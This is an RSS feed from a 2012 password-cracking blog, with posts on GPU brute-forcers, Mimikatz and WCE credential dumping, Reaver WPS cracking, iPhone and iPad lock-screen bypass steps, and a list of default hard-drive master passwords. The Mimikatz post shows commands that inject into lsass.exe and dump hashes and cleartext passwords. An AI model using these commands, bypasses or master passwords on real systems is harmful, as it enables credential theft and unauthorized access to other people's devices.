<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>What&#039;s My Pass?</title>
	<atom:link href="http://www.whatsmypass.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.whatsmypass.com</link>
	<description>Password Recovery for Windows, Mac, Linux, browsers, email, instant messengers, BIOS</description>
	<lastBuildDate>Mon, 07 May 2012 18:15:43 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>OpenCL Multiforcer</title>
		<link>http://www.whatsmypass.com/opencl-multiforcer</link>
		<comments>http://www.whatsmypass.com/opencl-multiforcer#comments</comments>
		<pubDate>Mon, 07 May 2012 18:15:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[cracking]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1352</guid>
		<description><![CDATA[In beta testing for linux right now, only supports NTLM and MD5 right now. But you are able to bruteforce passwords from multiple sources at the same time. Download from here: https://sourceforge.net/projects/cryptohaze/files/New-Multiforcer-Linux_x64_1_31.tar.bz2/download]]></description>
			<content:encoded><![CDATA[<p><img src="http://1.bp.blogspot.com/-dtmu91Pnd5U/T6DZtofGFQI/AAAAAAAAAB4/Hg7RN-mFhd8/s400/MFN_running.png">
<p>
In beta testing for linux right now, only supports NTLM and MD5 right now. But you are able to bruteforce passwords from multiple sources at the same time. Download from here: <a href="https://sourceforge.net/projects/cryptohaze/files/New-Multiforcer-Linux_x64_1_31.tar.bz2/download" target="_blank">https://sourceforge.net/projects/cryptohaze/files/New-Multiforcer-Linux_x64_1_31.tar.bz2/download</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/opencl-multiforcer/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Crack PDF passwords using BeagleBone</title>
		<link>http://www.whatsmypass.com/crack-pdf-passwords-using-beaglebone</link>
		<comments>http://www.whatsmypass.com/crack-pdf-passwords-using-beaglebone#comments</comments>
		<pubDate>Tue, 03 Apr 2012 19:03:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[cracking]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1338</guid>
		<description><![CDATA[The password protected PDF file is passed to the Beaglebone device on a thumb drive. Since the BeagleBone is running embedded Linux you don’t need to mess around with figuring out how to read from the device. A click of the button starts the process. Currently the code just uses a brute force attack which [...]]]></description>
			<content:encoded><![CDATA[<p>The password protected PDF file is passed to the Beaglebone device on a thumb drive. Since the BeagleBone is running embedded Linux you don’t need to mess around with figuring out how to read from the device. A click of the button starts the process. Currently the code just uses a brute force attack which can test more than 6000 four-character passwords per second on the 700 MHz ARM processor.  This is quite slow for any password more than four or five characters long, but [Nuno] does mention the possibility of running several ARM processors in parallel, or using a dictionary (or rainbow table) to speed things up. Either way it’s an interesting project to try on the hardware.<br />
Src: <a href="http://www.nunoalves.com/open_source/?p=221" target="_blank">nunoalves.com</a></p>
<p> <iframe width="500" height="315" src="http://www.youtube.com/embed/1uXesJL-hok?rel=0" frameborder="0" allowfullscreen></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/crack-pdf-passwords-using-beaglebone/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MimiKatz &#8211; clear text passwords</title>
		<link>http://www.whatsmypass.com/mimikatz-clear-text-passwords</link>
		<comments>http://www.whatsmypass.com/mimikatz-clear-text-passwords#comments</comments>
		<pubDate>Thu, 29 Mar 2012 17:27:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1333</guid>
		<description><![CDATA[As you&#8217;ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext [...]]]></description>
			<content:encoded><![CDATA[<p>As you&#8217;ve seen in our previous post about <a href="http://www.whatsmypass.com/windows-credentials-editor-wce-1-3-x64-released" target="_blank">WCE</a>, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French <a href="http://blog.gentilkiwi.com/mimikatz" target="_blank">http://blog.gentilkiwi.com/mimikatz</a></p>
<p>Below is a demonstration of how to use mimikatz, all commands typed are in <span style="color: #ff0000;">red</span>:<br />
(The privilege::debug command is not required if you are already system.)<br />
<code><br />
<span style="color: #3366ff;">C:\Mimikatz\x64&gt;</span><span style="color: #ff0000;">mimikatz</span><br />
<span style="color: #008000;">mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */</span><br />
<span style="color: #008000;"> // http://blog.gentilkiwi.com/mimikatz</span></code></p>
<p><span style="color: #0000ff;">mimikatz #</span> <span style="color: #ff0000;">privilege::debug </span><br />
<span style="color: #008000;">Demande d&#8217;ACTIVATION du privilège : SeDebugPrivilege : OK</span></p>
<p><span style="color: #0000ff;">mimikatz #</span> <span style="color: #ff0000;">inject::process lsass.exe sekurlsa.dll</span><br />
<span style="color: #008000;">PROCESSENTRY32(lsass.exe).th32ProcessID = 568</span><br />
<span style="color: #008000;"> Attente de connexion du client&#8230;</span><br />
<span style="color: #008000;"> Serveur connecté à un client !</span><br />
<span style="color: #008000;"> Message du processus :</span><br />
<span style="color: #008000;"> Bienvenue dans un processus distant</span><br />
<span style="color: #008000;"> Gentil Kiwi</span></p>
<p><span style="color: #008000;">SekurLSA : librairie de manipulation des données de sécurités dans LSASS</span></p>
<p><span style="color: #0000ff;">mimikatz #</span> <span style="color: #ff0000;">@getLogonPasswords</span></p>
<p><span style="color: #008000;">Authentification Id         : 0;160179</span><br />
<span style="color: #008000;">Package d&#8217;authentification  : NTLM</span><br />
<span style="color: #008000;">Utilisateur principal       : Administrator</span><br />
<span style="color: #008000;">Domaine d&#8217;authentification  : TestBox64</span><br />
<span style="color: #008000;">        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b }, </span><br />
<span style="color: #008000;"> ntlm{ cc36cf7a8514893efccd332446158b1a }</span><br />
<span style="color: #008000;">        wdigest :       waza1234/</span><br />
<span style="color: #008000;">        tspkg :         waza1234/</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/mimikatz-clear-text-passwords/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows Credentials Editor (WCE) 1.3 x64 released</title>
		<link>http://www.whatsmypass.com/windows-credentials-editor-wce-1-3-x64-released</link>
		<comments>http://www.whatsmypass.com/windows-credentials-editor-wce-1-3-x64-released#comments</comments>
		<pubDate>Wed, 14 Mar 2012 22:24:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[cracking]]></category>
		<category><![CDATA[Password Info]]></category>
		<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1326</guid>
		<description><![CDATA[Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, [...]]]></description>
			<content:encoded><![CDATA[<p>Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems. Also dumps passwords in plain-text without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.</p>
<p>Current Version: WCE v1.3beta (32-bit) <a href="http://www.ampliasecurity.com/research/wce_v1_3beta.tgz">(download)</a> - WCE v1.3beta (64-bit) <a href="http://www.ampliasecurity.com/research/wce_v1_3beta_x64.tgz">(download)</a></p>
<p>Frequently Asked Questions (FAQ) available <a href="http://www.ampliasecurity.com/research/wcefaq.html">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/windows-credentials-editor-wce-1-3-x64-released/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Estimating Password and Token Entropy in Web Apps</title>
		<link>http://www.whatsmypass.com/estimating-password-and-token-entropy-in-web-apps</link>
		<comments>http://www.whatsmypass.com/estimating-password-and-token-entropy-in-web-apps#comments</comments>
		<pubDate>Wed, 22 Feb 2012 20:46:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[cracking]]></category>
		<category><![CDATA[Password Info]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1319</guid>
		<description><![CDATA[Ryan O&#8217;Horo from IOActive has a great article discussing how to estimate password and token entropy using Wolfram Alpha, check it out on IOActive&#8217;s Blog]]></description>
			<content:encoded><![CDATA[<p>Ryan O&#8217;Horo from IOActive has a great article discussing how to estimate password and token entropy using Wolfram Alpha, check it out on <a href="http://blog.ioactive.com/2012/02/estimating-password-and-token-entropy.html" target="_blank">IOActive&#8217;s Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/estimating-password-and-token-entropy-in-web-apps/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cracking WPA/WPA2 with Reaver</title>
		<link>http://www.whatsmypass.com/cracking-wpawpa2-with-reaver</link>
		<comments>http://www.whatsmypass.com/cracking-wpawpa2-with-reaver#comments</comments>
		<pubDate>Tue, 24 Jan 2012 15:57:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[Wireless]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1311</guid>
		<description><![CDATA[The WiFi Protected Setup (WPS) protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours, using the open source tool called Reaver. Think your 32 character alpha-numeric password is uncrackable? If your wireless router is [...]]]></description>
			<content:encoded><![CDATA[<p>The WiFi Protected Setup (WPS) protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours, using the open source tool called <a href="http://code.google.com/p/reaver-wps/" title="http://code.google.com/p/reaver-wps/" target="_blank">Reaver</a>. Think your 32 character alpha-numeric password is uncrackable? If your wireless router is using WPS then your router may be spit back your password in plain-text to the attacker in less than 10 hrs. WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point&#8217;s PIN and then extract the PSK and give it to the attacker. When we tested Reaver in our labs we were able to recovery the WPA password in 1.5hrs and the longest run was 7.5hrs <img alt="Reaver Test" src="http://i.imgur.com/MQ0Su.jpg" title="Reaver Test" class="aligncenter" width="520" height="480" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/cracking-wpawpa2-with-reaver/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>iPhone iOS 4.3.5 vulnerability</title>
		<link>http://www.whatsmypass.com/iphone-ios-4-3-5-vulnerability</link>
		<comments>http://www.whatsmypass.com/iphone-ios-4-3-5-vulnerability#comments</comments>
		<pubDate>Mon, 12 Dec 2011 15:16:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apple]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Privilege Escalation]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1309</guid>
		<description><![CDATA[iPhone iOS 4.3.5 vulnerability (pin/password bypass to make calls) from Sigtrap. Turn on the phone. Slide to unlock. Press Emergency Call. Enter a very long phone number. Press and hold down the Power button. Wait for one second. Press the Call button. The phone will show the &#8220;Slide to power off&#8221; screen. Release the Power [...]]]></description>
			<content:encoded><![CDATA[<p><center><iframe src="http://player.vimeo.com/video/31654453?title=0&amp;byline=0&amp;portrait=0" width="400" height="300" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>
<p><a href="http://vimeo.com/31654453">iPhone iOS 4.3.5 vulnerability (pin/password bypass to make calls)</a> from <a href="http://vimeo.com/sigtrap">Sigtrap</a>.</p>
<p></center></p>
<ol>
<li>Turn on the phone.</li>
<li>Slide to unlock.</li>
<li>Press Emergency Call.</li>
<li>Enter a very long phone number.</li>
<li>Press and hold down the Power button.</li>
<li>Wait for one second.</li>
<li>Press the Call button.</li>
<li>The phone will show the &#8220;Slide to power off&#8221; screen.</li>
<li>Release the Power button.</li>
<li>Press Cancel.</li>
<li>Double press the Home button.</li>
<li>Press the Phone icon.</li>
<li>Make calls. </li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/iphone-ios-4-3-5-vulnerability/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How secure is your password?</title>
		<link>http://www.whatsmypass.com/how-secure-is-your-password</link>
		<comments>http://www.whatsmypass.com/how-secure-is-your-password#comments</comments>
		<pubDate>Mon, 28 Nov 2011 18:04:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[cracking]]></category>
		<category><![CDATA[Life]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Password Info]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1304</guid>
		<description><![CDATA[Just head over to the service’s website and enter a password in the form. You do not necessarily have to enter a password that you use actively. You can alternatively enter a comparable password to find out how long it would take to hack your password with a brute force, or maybe a combined dictionary [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://i.imgur.com/FYlTc.jpg" alt="" / width="495"><br />
Just head over to the service’s <a href="http://www.howsecureismypassword.net/" target="_blank">website</a> and enter a password in the form. You do not necessarily have to enter a password that you use actively. You can alternatively enter a comparable password to find out how long it would take to hack your password with a brute force, or maybe a combined dictionary and brute force attack. </p>
<p><a href="http://www.howsecureismypassword.net/" target="_blank">http://www.howsecureismypassword.net/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-secure-is-your-password/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bypass IPad 2 passcode with a smart cover</title>
		<link>http://www.whatsmypass.com/bypass-ipad-2-passcode-with-a-smart-cover</link>
		<comments>http://www.whatsmypass.com/bypass-ipad-2-passcode-with-a-smart-cover#comments</comments>
		<pubDate>Fri, 21 Oct 2011 04:13:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apple]]></category>
		<category><![CDATA[Privilege Escalation]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1292</guid>
		<description><![CDATA[Anyone with a Smart Cover can break into your “password-protected” iPad 2. This issue occurs in iOS 5, but we’re hearing uncorroborated reports of it also working in earlier versions of iOS 4.3. What the flaw allows: As you can see in the video above, a Smart Cover can essentially unlock an iPad 2. The [...]]]></description>
			<content:encoded><![CDATA[<p>Anyone with a Smart Cover can break into your “password-protected” iPad 2. This issue occurs in iOS 5, but we’re hearing uncorroborated reports of it also working in earlier versions of iOS 4.3.<br />
<iframe width="500" height="315" src="http://www.youtube.com/embed/NLgQ22naQhE" frameborder="0" allowfullscreen></iframe></p>
<p><strong>What the flaw allows:</strong></p>
<p>As you can see in the video above, a Smart Cover can essentially unlock an iPad 2. The person who unlocks your iPad 2 will not have complete access to your iPad, but will be able to gain entrance to whatever you locked your iPad 2 on. If your iPad 2 went to sleep in Mail, Safari, Messages, Contacts, or Maps, you can imagine the sorts of personal information that can be viewed on your iPad. If you left your iPad 2 on its Home screen, the person can view which applications you have on your device, control media from the multitasking bar, but not much else.</p>
<p><strong>How to re-create it:</strong></p>
<p>1) Lock a password protected iPad 2</p>
<p>2) Hold down power button until iPad 2 reaches turn off slider</p>
<p>3) Close Smart Cover</p>
<p>4) Open Smart Cover</p>
<p>5) Click cancel on the bottom of the screen</p>
<p>(src:<a href="http://9to5mac.com/2011/10/20/anyone-with-a-smart-cover-can-break-into-your-ipad-2/" title="9to5mac" target="_blank">9to5mac.com</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/bypass-ipad-2-passcode-with-a-smart-cover/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hard Drive Master Passwords</title>
		<link>http://www.whatsmypass.com/hard-drive-master-passwords</link>
		<comments>http://www.whatsmypass.com/hard-drive-master-passwords#comments</comments>
		<pubDate>Sun, 16 Oct 2011 08:13:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Password Info]]></category>
		<category><![CDATA[Privilege Escalation]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1278</guid>
		<description><![CDATA[Here&#8217;s a small compilation of passwords. If you have any to add please email us. We also can crack DELL HDD passwords for $10 ::Here:: SEAGATE -&#62; “Seagate” +25 spaces MAXTOR series N40P -&#62; “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces series N40P -&#62; “Maxtor INIT SECURITY TEST STEP F” series 541DX -&#62; [...]]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s a small compilation of <a href="http://ipv5.wordpress.com/2008/04/14/list-of-hard-disk-ata-master-passwords/" target="_blank">passwords</a>. If you have any to add please email us. We also can crack DELL HDD passwords for $10 <a href="http://www.whatsmypass.com/bios-password-recovery-service">::Here::</a></p>
<p><strong>SEAGATE</strong> -&gt; “Seagate” +25 spaces</p>
<p><strong>MAXTOR</strong><br />
series N40P -&gt; “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces<br />
series N40P -&gt; “Maxtor INIT SECURITY TEST STEP F”<br />
series 541DX -&gt; “Maxtor” +24 spaces<br />
series Athena (D541X model 2B) and diamondmax80 -&gt; “Maxtor”</p>
<p><strong>WESTERN DIGITAL</strong> -&gt; “WDCWDCWDCWDCWDCWDCWDCWDCWDCWDCWD”</p>
<p><strong>FUJITSU</strong> -&gt; 32 spaces</p>
<p><strong>SAMSUNG</strong> -&gt; “ttttttttttttttttttttttttttttttttt” (32 times t)</p>
<p><strong>IBM</strong><br />
series DTTA -&gt; “CED79IJUFNATIT” +18 spaces<br />
series DJNA -&gt; “VON89IJUFSUNAJ” +18 spaces<br />
series DPTA -&gt; “VON89IJUFSUNAJ” +18 spaces<br />
series DTLA -&gt; “RAM00IJUFOTSELET” +16 spaces<br />
series DADA-26480 (6,4gb) -&gt; “BEF89IJUF__AIDACA” +15 spaces</p>
<p><strong>HITACHI</strong> series DK23AA, DK23BA and DK23CA -&gt; 32 spaces</p>
<p><strong>TOSHIBA</strong> -&gt; 32 spaces</p>
<p>For xbox hdds try “XBOXSCENE” or “TEAMASSEMBLY” too</p>
<p>There is also some software available to reset the password called <a href="http://hddguru.com/software/2005.10.02-MHDD/" target="_blank">MHDD</a>, another suggested program is <a href="http://www.rockbox.org/atapwd.zip" target="_blank">ATAPWD</a>. A Commercial tool from <a href="http://www.hddunlock.com/download/" target="_blank">HDDLock</a> claims to unlock drives and prices <a href="http://www.hddunlock.com/purchase/" target="_blank">vary</a> with drive size.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/hard-drive-master-passwords/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

